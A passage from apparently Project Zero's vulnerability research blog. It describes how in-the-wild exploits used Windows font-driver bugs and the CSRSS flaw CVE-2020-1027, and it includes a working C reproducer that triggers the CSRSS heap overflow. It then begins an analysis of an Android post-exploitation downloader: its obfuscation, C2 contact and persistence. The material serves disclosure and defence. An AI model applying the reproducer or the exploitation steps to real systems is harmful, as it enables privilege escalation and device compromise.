When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000

PXE at FFFFF6FB7DBEDF90          

contains 0000000115879863    

pfn 115879    ---DA--KWEV    

PPE at FFFFF6FB7DBF2000

contains 0000000115878863

pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000

contains 0000000115877863

pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000

contains 8000000115976863

pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[16];

  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {

    return -4;

  }

  [...]

}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    if (num_master >= 16) {

      return -4;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  [...]

}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(

    PCSR_API_MSG ApiMessage, 

    PVOID CaptureBuffer, 

    ULONG ApiNumber, 

    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="1.0.0.0" processorArchitecture="x86"/>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="2.5.0.0" processorArchitecture="x86"/>

    </dependentAssembly>

  </dependency>

</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {

  USHORT Length;

  USHORT MaximumLength;

  PWSTR  Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {

  if (StringField = StringFields[i]) {

    Length = StringField->Length;

    if (Length && !StringField->Buffer ||

        Length > StringField->MaximumLength || Length & 1)

      return 0xC000000D;

    if (StringField->Buffer) {

      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,

                                    Length + 2, 1)) {

        DbgPrintEx(0x33, 0,

                   "SXS: Validation of message buffer 0x%lx failed.\n"

                   " Message:%p\n"

                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",

                   i, ApiMessage, StringField, StringField->Length,

                   StringField->MaximumLength, StringField->Buffer);

        return 0xC000000D;

      }

      CharCount = StringField->Length >> 1;

      if (StringField->Buffer[CharCount] &&

          StringField->Buffer[CharCount - 1])

        return 0xC000000D;

    }

  }

}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(

    PCSR_API_MSG ApiMessage,

    PVOID* Buffer,

    ULONG ElementCount,

    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity

sxs!CNodeFactory::CreateNode

sxs!XMLParser::Run

sxs!SxspIncorporateAssembly

sxs!SxspCloseManifestGraph

sxs!SxsGenerateActivationContext

sxssrv!BaseSrvSxsCreateActivationContextFromStructEx

sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;

if (BufferCapacity) {

  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;

  GenActCtxParams.ApplicationNameBuffer =

      CreateCtxParams->ApplicationName.Buffer;

} else {

  GenActCtxParams.ApplicationNameCapacity = 60;

  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);

  if (!StringBuffer) {

    Status = 0xC0000017;

    goto error;

  }

  GenActCtxParams.ApplicationNameBuffer = StringBuffer;

}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);

if (Context) {

  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);

} else {

  FusionpTraceAllocFailure(v14);

  SetLastError(0xE);

  goto error;

}

if (GenActCtxParams->ApplicationNameBuffer &&

    GenActCtxParams->ApplicationNameCapacity) {

  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;

  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;

}

Ultimately, sxs!CNodeFactory::

XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;

IdentityNameLength = 0;

SetLastError(0);

if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,

                                           &IdentityNameBuffer,

                                           &IdentityNameLength)) {

  CallSiteInfo = off_16506FA20;

  goto error;

}

if (IdentityNameLength &&

    IdentityNameLength < Context->ApplicationNameCapacity) {

  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,

         2 * IdentityNameLength + 2);

  Context->ApplicationNameLength = IdentityNameLength;

} else {

  *Context->ApplicationNameBuffer = 0;

  Context->ApplicationNameLength = 0;

}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB”. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {

  LIST_ENTRY InLoadOrderModuleList;

  LIST_ENTRY InMemoryOrderModuleList;

  LIST_ENTRY InInitializationOrderModuleList;

  PVOID BaseAddress;

  PVOID EntryPoint;

  ULONG SizeOfImage;

  UNICODE_STRING FullDllName;

  UNICODE_STRING BaseDllName;

  ULONG Flags;

  SHORT LoadCount;

  SHORT TlsIndex;

  LIST_ENTRY HashTableEntry;

  ULONG TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;

if (ApplicationName.MaximumLength &&

    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,

                              ApplicationName.MaximumLength, 1)) {

  SavedMaximumLength = ApplicationName.MaximumLength;

  ApplicationName.MaximumLength = ApplicationName.Length + 2;

}

[...]

if (SavedMaximumLength)

  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =

      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>

#include <stdio.h>

#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =

    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"

    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"

    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "

    "processorArchitecture='amd64'/>"

    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =

  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"

  L"d761caeca23d64a2.manifest";

const WCHAR* PATH = L"\\\\.\\c:Windows\\";

const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,

                                                     ULONG BufferSize);

f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,

                                                   PVOID CaptureBuffer,

                                                   ULONG ApiNumber,

                                                   ULONG DataLength);

f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,

                                                       PCSTR String,

                                                       ULONG Length,

                                                       ULONG MaximumLength,

                                                       PSTR OutputString);

f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,

                              PCWSTR String, ULONG Length = 0) {

  if (Length == 0) {

    Length = lstrlenW(String);

  }

  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,

                                 Length * 2 + 2, OutputString);

}

int main() {

  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");

  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(

      Ntdll, "CsrAllocateCaptureBuffer");

  CsrClientCallServer =

      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");

  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(

      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];

  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;

  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.

  // The offsets and values are taken directly from the exploit.

  *(uint32_t*)(Message + 0x40) = 0xc1;

  *(uint16_t*)(Message + 0x44) = 9;

  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;

  // therefore, it doesn't have to be stored in the capture buffer.

  *(const char**)(Message + 0x80) = Manifest.c_str();

  *(uint64_t*)(Message + 0x88) = Manifest.size();

  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);

  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);

  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);

  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.

  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);

}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

...more

In-the-Wild Series: Android Post-Exploitation

Published: 2021-01-12 17:37:00

Popularity: 16

Author: Ryan

🤖: ""Malware lurking""

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will be calling different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3,  is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and points them to /dev/null. This will prevent output messages from appearing which may lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks.  It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function.The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration setting with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%

00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-

00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#

00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.

00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....

00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\

00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.

00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.

00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w

00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....

000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A

000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu

000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#

000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....

000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........

000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.

00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]

00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a

00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..

00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;

}

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;

};

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and static information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file too.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

Environment Variable Name

Value

abc

Address of the decryption data block

def

Address of the function that will send logging messages to the C2 server

def2

Address of the function that adds logging messages to the error and/or informational logging message queues

ghi

Points the the decrypted block of hashtable keys

ddd

Address of the function that performs inflate (decompress)

ccc

Address of the function that performs deflate (compress)

0x10 bytes at 0x228CC

???

0x10 bytes at 0x228DC

Pointer to the string representation of the hex_d_uuid

0x10 bytes at 0x228F0

Pointer to the C2 domain URL

0x10 bytes at 0x22904

Pointer to the port string for the C2 server

0x10 bytes at 0x22918

Pointer to the beginning of the certificate

0x10 bytes at 0x2292C

0x1000

0x10 bytes at 0x22940

Pointer to +4AA in decrypted data block

0x10 bytes at 0x22954

0x14

0x10 bytes at 0x22698

Pointer to the user-agent string

PPR

Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm”

PPMM

Set if there is no “persist.security.mdm.policy” string in /init

PPQQ

Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

